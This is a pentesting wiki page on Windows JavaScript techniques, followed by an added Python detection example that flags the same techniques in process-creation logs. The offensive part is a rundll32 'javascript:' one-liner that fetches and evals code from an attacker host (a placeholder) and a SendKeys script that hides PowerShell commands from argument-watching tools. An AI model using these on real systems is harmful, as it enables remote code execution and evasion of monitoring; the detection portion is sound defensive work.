Javascript

From BHaFSec Pentesting Notes Wiki

Reverseshell

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ATTACKERIP>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

The receiving server is located here; more info here.


Create and Install a Certificate in User Store

JSEnroll


Sendkeys and execute powershell example

var o = new ActiveXObject("WScript.Shell");
o.Run("powershell.exe -windowstyle hidden");      // start PowerShell with no command on its command line
WScript.Sleep(5000);                              // give the process time to start
o.AppActivate("Powershell");                      // bring the PowerShell window to the foreground so keystrokes reach it
o.SendKeys("Get-Process > .\\output.txt");        // the command is typed as keystrokes, not passed as a parameter
o.SendKeys("~");                                  // "~" is Enter in SendKeys notation

Execute with: wscript "<filename&path>.js". Because the command is typed via SendKeys, it never appears in the powershell.exe command-line parameters, so tools that only watch those parameters do not see it.
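Both techniques on this page leave the same kind of trace in process-creation telemetry, and the second one is specifically built to defeat rules that only inspect PowerShell arguments. The following is an added detection example, not code from the wiki: it runs two rules over constructed Sysmon-style process-creation records (the field names and all sample command lines are assumptions made for the example). A naive "parameter watcher" that keys on known-bad PowerShell arguments misses the SendKeys case entirely, while a rule on the parent process (a script host such as wscript.exe, cscript.exe, mshta.exe or rundll32.exe spawning a shell) catches it, and a separate rule flags rundll32.exe being handed an inline javascript: URL.

```python
# Added example (not from the wiki page): process-creation detection logic for the
# rundll32 javascript: reverse shell and the SendKeys-driven PowerShell technique,
# evaluated over constructed Sysmon-style records (field names are an assumption).
import re
from dataclasses import dataclass
from typing import List, Tuple

@dataclass
class ProcEvent:
    """Minimal process-creation record modelled on Sysmon Event ID 1 (assumed layout)."""
    pid: int
    image: str
    command_line: str
    parent_image: str

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# rundll32 loading mshtml with an inline script URL, as in the reverse-shell one-liner above
RUNDLL32_INLINE_SCRIPT = re.compile(r"javascript:|vbscript:|RunHTMLApplication", re.I)

# A naive "parameter watcher": fires only on well-known suspicious PowerShell arguments
POWERSHELL_ARG_KEYWORDS = re.compile(
    r"-enc(odedcommand)?\b|\biex\b|invoke-expression|downloadstring|executionpolicy\s+bypass",
    re.I,
)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parameter_watcher(events: List[ProcEvent]) -> List[int]:
    """PIDs of PowerShell processes whose command line carries known-bad arguments."""
    return [
        e.pid for e in events
        if basename(e.image) in {"powershell.exe", "pwsh.exe"}
        and POWERSHELL_ARG_KEYWORDS.search(e.command_line)
    ]

def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Rules that do not depend on the child's command line at all."""
    findings = []
    for e in events:
        img, parent = basename(e.image), basename(e.parent_image)
        # Rule 1: rundll32 given an inline script instead of a DLL to load
        if img == "rundll32.exe" and RUNDLL32_INLINE_SCRIPT.search(e.command_line):
            findings.append((e.pid, "rundll32_inline_script"))
        # Rule 2: a shell started by a script host; the typed command never shows up here
        if img in SHELLS and parent in SCRIPT_HOSTS:
            findings.append((e.pid, "shell_spawned_by_script_host"))
    return findings

# Constructed sample telemetry (paths, PIDs and arguments are made up for the example)
SAMPLE_EVENTS = [
    ProcEvent(101, r"C:\Windows\System32\rundll32.exe",
              'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();',
              r"C:\Windows\explorer.exe"),
    ProcEvent(102, r"C:\Windows\System32\wscript.exe",
              'wscript "C:\\Users\\alice\\notes.js"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(103, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -windowstyle hidden",         # command arrives via SendKeys, not argv
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(104, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Date",  # benign interactive use
              r"C:\Windows\explorer.exe"),
    ProcEvent(105, r"C:\Windows\System32\rundll32.exe",
              "rundll32.exe shell32.dll,Control_RunDLL",     # benign: a real DLL export
              r"C:\Windows\explorer.exe"),
    ProcEvent(106, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -EncodedCommand <constructed-base64-placeholder>",
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    print("parameter watcher flags:", parameter_watcher(SAMPLE_EVENTS))   # [106]
    print("parent/inline-script rules flag:", detect(SAMPLE_EVENTS))        # 101 and 103
```

Event 103 is the one the page describes: its command line is clean, so the argument-based rule never fires, but the parent being wscript.exe is enough for the second rule. The text actually typed into that hidden window (Get-Process > .\output.txt) can still be recovered from PowerShell script block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational), which records commands as they are executed regardless of how they were entered.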